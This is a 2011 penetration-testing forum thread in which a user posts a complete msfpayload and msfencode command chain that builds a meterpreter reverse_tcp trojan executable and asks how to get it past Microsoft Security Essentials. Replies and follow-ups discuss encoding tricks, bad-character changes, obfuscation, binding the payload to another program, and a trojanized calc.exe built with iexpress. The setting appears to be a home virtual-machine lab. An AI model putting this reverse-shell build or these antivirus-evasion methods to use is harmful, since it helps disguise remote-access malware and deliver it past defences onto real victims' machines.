.

msfencode

<<

acidicloop

Newbie
Newbie

Posts: 7

Joined: Tue Nov 29, 2011 12:40 am

Post Tue Nov 29, 2011 1:39 am

msfencode

Hello again. Ive been making some trojans with msfpayload and have been messing with msfencode. The trojan has worked great dropping the meterpreter shell, however, for the life of me I cannot get it past microsoft security essential antivirus. No matter what I do, it flags it. My code is this:
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.146.139 lport=4442 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > chucknorris.exe and I usually run an apache server and connect to it from the xp machine and download the trojan, or I do shared folders in VM. Any tricks yall know to bypass security essentials? I would think two counts of 10 a piece and shikata_ga_nai would do the trick, but alas it does not.
<<

j0rDy

User avatar

Hero Member
Hero Member

Posts: 591

Joined: Tue Feb 23, 2010 4:55 am

Location: Netherlands

Post Tue Nov 29, 2011 7:59 am

Re: msfencode

pff, this is not easy, i'd say you have two options. now please correct me if i'm wrong, i have no experience with this whatsoever!

first thing you could to to evade antivirus is make sure the code is different so it will not match the signature of the antivirus. You can do this by adding characters that may not be used. you can use the following parameter for this:    -b  The list of characters to avoid: 'x00xff'

another option would be to obfuscate the code or to attach the code to another executable, but i dont have any examples on that.

you probably already seen this one? http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass
CISSP, CEH, ECSA, OSCP, OSWP

earning my stripes appears to be a road i must travel alone...with a little help of EH.net
<<

Triban

User avatar

Hero Member
Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Tue Nov 29, 2011 8:25 am

Re: msfencode

I've noticed that MSE is pretty darn good at catching these customized trojans.  I had it catch the PDF exploit for cool type almost instantly.  I've had it also pick up traffic from an exploited website before other AV products did (SEP, ESET, AVG).  I have no idea why people would be upset with a company who designed an OS to use their own built in AV.  One would think who would know their system better than the creator of that system.

You may have to get creative with bypassing MSE.
Certs: GCWN
(@)Dewser
<<

chrisg

Post Tue Nov 29, 2011 9:13 am

Re: msfencode

<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Tue Nov 29, 2011 10:01 am

Re: msfencode

<<

acidicloop

Newbie
Newbie

Posts: 7

Joined: Tue Nov 29, 2011 12:40 am

Post Tue Nov 29, 2011 10:57 am

Re: msfencode

Thanks for the links. Glad to know, its not just my issue, lol. Now I thought shikata_ga_nai was polymorphic? curious why that wouldnt evade SE, unless like the article said, SE bases it off templates. I even did a trick where I uploaded the trojan, ran iexpress and made a self extracting executable by attaching it to calculator, so that when they closed out calc after use, it ran the meterpreter reverse_tcp. But it flagged that too and under the properties of the trojaned calc its even  signed by microsoft,lol

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software